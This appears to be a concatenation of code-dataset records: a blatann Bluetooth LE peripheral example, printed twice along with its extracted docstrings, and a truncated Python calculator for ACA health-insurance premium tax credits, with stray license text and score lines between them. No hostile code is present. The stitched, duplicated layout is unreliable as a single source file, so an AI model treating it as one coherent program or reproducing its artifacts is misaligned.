# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # now cached
1.947264
2
blatann/examples/peripheral.py
dkkeller/blatann
0
6629015
<filename>blatann/examples/peripheral.py """ This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service """ import atexit import binascii import struct import threading import time from blatann import BleDevice from blatann.uuid import Uuid16 from blatann.examples import example_utils, constants from blatann.gap import advertising, smp, IoCapabilities from blatann.waitables import GenericWaitable logger = example_utils.setup_logger(level="DEBUG") def on_connect(peer, event_args): """ Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None """ if peer: logger.info("Connected to peer") else: logger.warning("Connection timed out") def on_disconnect(peer, event_args): """ Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs """ logger.info("Disconnected from peer, reason: {}".format(event_args.reason)) def on_hex_conversion_characteristic_write(characteristic, event_args): """ Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. :param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs """ new_value = binascii.hexlify(event_args.value) logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid, new_value)) characteristic.set_value(new_value[:characteristic.max_length], notify_client=True) def on_gatts_subscription_state_changed(characteristic, event_args): """ Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs """ logger.info("Subscription state changed - characteristic: {}, state: {}".format( characteristic.uuid, event_args.subscription_state)) def on_time_char_read(characteristic, event_args): """ Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. :param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None """ t = time.time() ms = int((t * 1000) % 1000) msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms) characteristic.set_value(msg) def on_discovery_complete(peer, event_args): """ Callback for when the service discovery completes on the client. This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs """ device_name_char = peer.database.find_characteristic(Uuid16(0x2A00)) if device_name_char: device_name_char.read().then(lambda c, e: logger.info("Client's device name: {}".format(e.value.decode("utf-8")))) else: logger.info("Peer does not have a device name characteristic") def on_security_level_changed(peer, event_args): """ Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. :param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs """ if event_args.security_level in [smp.SecurityLevel.MITM, smp.SecurityLevel.LESC_MITM, smp.SecurityLevel.JUST_WORKS]: logger.info("Secure connections established, discovering database on the client") if not peer.database.services: peer.discover_services().then(on_discovery_complete) else: on_discovery_complete(peer, None) def on_client_pairing_complete(peer, event_args): """ Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs """ logger.info("Client Pairing complete, status: {}".format(event_args.status)) def on_passkey_display(peer, event_args): """ Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs """ logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request)) if event_args.match_request: response = input("Passkey: {}, do both devices show same passkey? [y/n]\n".format(event_args.passkey)) match = response.lower().startswith("y") event_args.match_confirm(match) def on_passkey_entry(peer, passkey_event_args): """ Callback for when the user is requested to enter a passkey to resume the pairing process. Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs """ passkey = input("Enter passkey: ") passkey_event_args.resolve(passkey) class CountingCharacteristicThread(object): """ Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. """ def __init__(self, characteristic): """ :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic """ self.current_value = 0 self._stop_event = threading.Event() self._stopped = threading.Event() self.characteristic = characteristic self.characteristic.on_notify_complete.register(self._on_notify_complete) self.thread = threading.Thread(target=self.run) atexit.register(self.join) self.thread.daemon = True self.thread.start() def join(self): """ Used to stop and join the thread """ self._stop_event.set() self._stopped.wait(3) def _on_notify_complete(self, characteristic, event_args): """ Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs """ logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason)) def run(self): while not self._stop_event.is_set(): try: if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed time.sleep(1) continue # Increment the value and pack it self.current_value += 1 value = struct.pack("<I", self.current_value) # Send out a notification of this new value waitable = self.characteristic.notify(value) # Send a burst of 16, then wait for them all to send before trying to send more if self.current_value % 16 == 0: waitable.wait() time.sleep(1) # Wait a second before sending out the next burst except Exception as e: logger.exception(e) self._stopped.set() def main(serial_port): # Create and open the device ble_device = BleDevice(serial_port) ble_device.configure() ble_device.open() # Set up desired security parameters ble_device.client.security.set_security_params(passcode_pairing=False, bond=False, lesc_pairing=False, io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False) ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete) ble_device.client.security.on_passkey_display_required.register(on_passkey_display) ble_device.client.security.on_passkey_required.register(on_passkey_entry) ble_device.client.security.on_security_level_changed.register(on_security_level_changed) # Create and add the math service service = ble_device.database.add_service(constants.MATH_SERVICE_UUID) # Create and add the hex conversion characteristic to the service hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID, constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data") # Register the callback for when a write occurs and subscription state changes hex_conv_char.on_write.register(on_hex_conversion_characteristic_write) hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] counting_char = service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4) counting_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create the thread for the counting characteristic counting_char_thread = CountingCharacteristicThread(counting_char) # Create and add the time service time_service = ble_device.database.add_service(constants.TIME_SERVICE_UUID) # Add the time characteristic and register the callback for when its read time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time") time_char.on_read.register(on_time_char_read) # Initialize the advertising and scan response data adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06) scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True) ble_device.advertiser.set_advertise_data(adv_data, scan_data) # Start advertising logger.info("Advertising") ble_device.client.on_connect.register(on_connect) ble_device.client.on_disconnect.register(on_disconnect) ble_device.advertiser.start(timeout_sec=0, auto_restart=True) # Create a waitable that will never fire, and wait for some time w = GenericWaitable() w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins # Cleanup counting_char_thread.join() logger.info("Done") ble_device.close() if __name__ == '__main__': main("COM13")
<filename>blatann/examples/peripheral.py """ This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service """ import atexit import binascii import struct import threading import time from blatann import BleDevice from blatann.uuid import Uuid16 from blatann.examples import example_utils, constants from blatann.gap import advertising, smp, IoCapabilities from blatann.waitables import GenericWaitable logger = example_utils.setup_logger(level="DEBUG") def on_connect(peer, event_args): """ Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None """ if peer: logger.info("Connected to peer") else: logger.warning("Connection timed out") def on_disconnect(peer, event_args): """ Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs """ logger.info("Disconnected from peer, reason: {}".format(event_args.reason)) def on_hex_conversion_characteristic_write(characteristic, event_args): """ Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. :param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs """ new_value = binascii.hexlify(event_args.value) logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid, new_value)) characteristic.set_value(new_value[:characteristic.max_length], notify_client=True) def on_gatts_subscription_state_changed(characteristic, event_args): """ Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs """ logger.info("Subscription state changed - characteristic: {}, state: {}".format( characteristic.uuid, event_args.subscription_state)) def on_time_char_read(characteristic, event_args): """ Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. :param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None """ t = time.time() ms = int((t * 1000) % 1000) msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms) characteristic.set_value(msg) def on_discovery_complete(peer, event_args): """ Callback for when the service discovery completes on the client. This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs """ device_name_char = peer.database.find_characteristic(Uuid16(0x2A00)) if device_name_char: device_name_char.read().then(lambda c, e: logger.info("Client's device name: {}".format(e.value.decode("utf-8")))) else: logger.info("Peer does not have a device name characteristic") def on_security_level_changed(peer, event_args): """ Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. :param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs """ if event_args.security_level in [smp.SecurityLevel.MITM, smp.SecurityLevel.LESC_MITM, smp.SecurityLevel.JUST_WORKS]: logger.info("Secure connections established, discovering database on the client") if not peer.database.services: peer.discover_services().then(on_discovery_complete) else: on_discovery_complete(peer, None) def on_client_pairing_complete(peer, event_args): """ Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs """ logger.info("Client Pairing complete, status: {}".format(event_args.status)) def on_passkey_display(peer, event_args): """ Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs """ logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request)) if event_args.match_request: response = input("Passkey: {}, do both devices show same passkey? [y/n]\n".format(event_args.passkey)) match = response.lower().startswith("y") event_args.match_confirm(match) def on_passkey_entry(peer, passkey_event_args): """ Callback for when the user is requested to enter a passkey to resume the pairing process. Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs """ passkey = input("Enter passkey: ") passkey_event_args.resolve(passkey) class CountingCharacteristicThread(object): """ Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. """ def __init__(self, characteristic): """ :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic """ self.current_value = 0 self._stop_event = threading.Event() self._stopped = threading.Event() self.characteristic = characteristic self.characteristic.on_notify_complete.register(self._on_notify_complete) self.thread = threading.Thread(target=self.run) atexit.register(self.join) self.thread.daemon = True self.thread.start() def join(self): """ Used to stop and join the thread """ self._stop_event.set() self._stopped.wait(3) def _on_notify_complete(self, characteristic, event_args): """ Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs """ logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason)) def run(self): while not self._stop_event.is_set(): try: if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed time.sleep(1) continue # Increment the value and pack it self.current_value += 1 value = struct.pack("<I", self.current_value) # Send out a notification of this new value waitable = self.characteristic.notify(value) # Send a burst of 16, then wait for them all to send before trying to send more if self.current_value % 16 == 0: waitable.wait() time.sleep(1) # Wait a second before sending out the next burst except Exception as e: logger.exception(e) self._stopped.set() def main(serial_port): # Create and open the device ble_device = BleDevice(serial_port) ble_device.configure() ble_device.open() # Set up desired security parameters ble_device.client.security.set_security_params(passcode_pairing=False, bond=False, lesc_pairing=False, io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False) ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete) ble_device.client.security.on_passkey_display_required.register(on_passkey_display) ble_device.client.security.on_passkey_required.register(on_passkey_entry) ble_device.client.security.on_security_level_changed.register(on_security_level_changed) # Create and add the math service service = ble_device.database.add_service(constants.MATH_SERVICE_UUID) # Create and add the hex conversion characteristic to the service hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID, constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data") # Register the callback for when a write occurs and subscription state changes hex_conv_char.on_write.register(on_hex_conversion_characteristic_write) hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] counting_char = service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4) counting_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create the thread for the counting characteristic counting_char_thread = CountingCharacteristicThread(counting_char) # Create and add the time service time_service = ble_device.database.add_service(constants.TIME_SERVICE_UUID) # Add the time characteristic and register the callback for when its read time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time") time_char.on_read.register(on_time_char_read) # Initialize the advertising and scan response data adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06) scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True) ble_device.advertiser.set_advertise_data(adv_data, scan_data) # Start advertising logger.info("Advertising") ble_device.client.on_connect.register(on_connect) ble_device.client.on_disconnect.register(on_disconnect) ble_device.advertiser.start(timeout_sec=0, auto_restart=True) # Create a waitable that will never fire, and wait for some time w = GenericWaitable() w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins # Cleanup counting_char_thread.join() logger.info("Done") ble_device.close() if __name__ == '__main__': main("COM13")
en
0.795256
This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. :param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. :param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None Callback for when the service discovery completes on the client. This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. :param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs Callback for when the user is requested to enter a passkey to resume the pairing process. Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic Used to stop and join the thread Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs # Do nothing until a client is subscribed # Increment the value and pack it # Send out a notification of this new value # Send a burst of 16, then wait for them all to send before trying to send more # Wait a second before sending out the next burst # Create and open the device # Set up desired security parameters # Create and add the math service # Create and add the hex conversion characteristic to the service # Register the callback for when a write occurs and subscription state changes # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] # Create the thread for the counting characteristic # Create and add the time service # Add the time characteristic and register the callback for when its read # Initialize the advertising and scan response data # Start advertising # Create a waitable that will never fire, and wait for some time # Keep device active for 30 mins # Cleanup
2.925374
3
PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py
AngelLiang/PP4E
0
6629016
<filename>PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py #!/usr/bin/python3 """ ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. ===================================================================================== """ trace = print # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # IRSpovertyToContribRanges = [ [(0, 133), (2.0, 2.0) ], # povlow%..povhigh%, paylow%..payhigh% [(133, 150), (3.0, 4.0) ], # should this be 2.0..4.0?: not in IRS doc [(150, 200), (4.0, 6.3) ], [(200, 250), (6.3, 8.05)], [(250, 300), (8.05, 9.5) ], [(300, 400), (9.5, 9.5)]] # inclusive at 400, but not for 400.0001 def mapRanges(povpct, povlow, povhigh, paylow, payhigh): # 135, (133..150), (3.0..4.0) """ Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. """ povrange = povhigh - povlow # 17 = 150 - 133 payrange = payhigh - paylow # 1.0 = 4.0 - 3.0 povincr = povpct - povlow # 2 = 135 - 133 pctincr = povincr / povrange # pct = 2 / 17 paypct = paylow + (pctincr * payrange) # 3.0 + (pct * 1.0) return round(paypct, 2) # per IRS: round to nearest 100th def test_mapRanges(): for [(povlow, povhigh), (paylow, payhigh)] in IRSpovertyToContribRanges: for povpct in range(povlow, povhigh): paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) print(povpct, '=>', paypct) print('-' * 40) assert mapRanges(210, 200, 250, 6.3, 8.05) == 6.65 # per IRS doc example assert mapRanges(135, 133, 150, 3.0, 4.0) == 3.12 # original dev example assert mapRanges(150, 150, 200, 4.0, 6.3) == 4.0 assert mapRanges(200, 150, 200, 4.0, 6.3) == 6.3 assert mapRanges(300, 300, 400, 9.5, 9.5) == 9.5 assert mapRanges(400, 300, 400, 9.5, 9.5) == 9.5 ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### def povertyPercent(income, numpeople): """ Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. """ HHSpovertyLevels = { 1: 11490, # or index a list[numpeople-1] 2: 15510, # 15510 = 62040 / 4 3: 19530, # 11490 = 45960 / 4 4: 23550, 5: 27570, 6: 31590, # VB: must inflate levels? 7: 35610, 8: 39630} if numpeople in HHSpovertyLevels: povlevel = HHSpovertyLevels[numpeople] else: povlevel = HHSpovertyLevels[8] + (4020 * (numpeople - 8)) return (income / povlevel) * 100 testincomes = (100000, 62039, 62040, 62041, # +$1 income = $0 credit threshhold for 2 ppl! 45959, 45960, 45961, # +$1 income = $0 credit thresshold for 1 ppl! 22980, 52988, # see asserts ahead 40000, 31021, 31020, 20000, 10000) def test_povertyPercent(): print('=' * 40) for numpeople in (2, 1): for income in testincomes: print(numpeople, income, '=>', povertyPercent(income, numpeople)) print('=' * 40) ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### def applyContribRanges(povpct): """ Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). """ lenofranges = len(IRSpovertyToContribRanges) countranges = enumerate(IRSpovertyToContribRanges) for row, [(povlow, povhigh), (paylow, payhigh)] in countranges: lastrow = (row+1 == lenofranges) if lastrow: inrange = (povlow <= povpct <= povhigh) # VB: x <= y and y <= z else: inrange = (povlow <= povpct < povhigh) if inrange: paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) trace('(%.2f => %.2f)' % (povpct, paypct)) return paypct return 100 # > high end of ranges: no tax credit offset, pays premium in full def insureePremiumContribution(income, numpeople): """ Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. """ povertyPct = povertyPercent(income, numpeople) contribPct = applyContribRanges(povertyPct) contribAmt = income * (contribPct / 100) trace('[%s, %s => %.2f, %.2f, %.2f]' % (income, numpeople, contribPct, contribAmt, contribAmt/12)) return contribAmt def ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarksilverpremium): """ ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. --really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... (f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ """ contributionbase = insureePremiumContribution(income, numpeople) benchmarkexcess = max(0, benchmarksilverpremium - contributionbase) taxcredit = min(actualpremium, benchmarkexcess) netpremium = actualpremium - taxcredit # VB: must inflate premiums return taxcredit # VB: netpremium not returned def test_ACApremiumTaxCredit(): """ Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. """ examplepremiums = (431, 816) for numpeople in (2, 1): benchprem = examplepremiums[numpeople-1] * 12 # 2nd lowest silver for area actualprem = benchprem - (100 * 12) # bronze est: $100/mo < silver print('-' * 79) for income in testincomes: print('ppl=%d, inc=%d' % (numpeople, income)) yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actualprem, benchprem) yrnetpremium = actualprem - yrtaxcredit print('** [Month: %d (prem) = %.2f (tax) + %.2f (you)] [Year: %d=%d+%d]\n' % (actualprem/12, yrtaxcredit/12, yrnetpremium/12, actualprem, yrtaxcredit, yrnetpremium)) global trace trace = lambda *args: None assert round(ACApremiumTaxCredit(22980,1,5000,5000), 2) == 3552.26 # actual = benchmark, 200% pov assert round(ACApremiumTaxCredit(22980,1,4500,5000), 2) == 3552.26 # actual < benchmark assert round(ACApremiumTaxCredit(22980,1,3500,5000), 2) == 3500.00 assert round(ACApremiumTaxCredit(22980,1,1000,5000), 2) == 1000.00 assert round(ACApremiumTaxCredit(22980,1,6000,5000), 2) == 3552.26 # actual > benchmark assert round(ACApremiumTaxCredit(22980,1,10000,5000),2) == 3552.26 assert round(ACApremiumTaxCredit(22980,1,1448,5000), 2) == 1448.00 # actual near contribution assert round(ACApremiumTaxCredit(22980,1,1447,5000), 2) == 1447.00 assert round(ACApremiumTaxCredit(22980,1,5,5000), 2) == 5.00 # unlikely but true assert round(ACApremiumTaxCredit(52988,4,15000,15000), 2) == 11195.46 # 225%: 15000=11195+3804 assert round(ACApremiumTaxCredit(62039,2,8592,9792), 2) == 3898.30 # 399.99%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62040,2,8592,9792), 2) == 3898.20 # 400.00%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62041,2,8592,9792), 2) == 0 # MASSIVE $4k DROPOFF FOR $1 INCOME! assert round(ACApremiumTaxCredit(94200,4,12000,13200), 2) == 4251.00 # 400%: 12k=4251+7749 (354/645) assert round(ACApremiumTaxCredit(94199,4,12000,13200), 2) == 4251.09 # 400%: ditto assert round(ACApremiumTaxCredit(94201,4,12000,13200), 2) == 0 # MASSIVE DROPOFF FOR 4: (0/1000) trace = print def test_interactive(): """ Test main function with interactively entered parameters. """ print('*' * 80) while True: try: reply = input('[income,people,actprem,benchprem]? ') if not reply: break income, numpeople, actprem, benchprem = [int(x) for x in reply.split(',')] yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actprem, 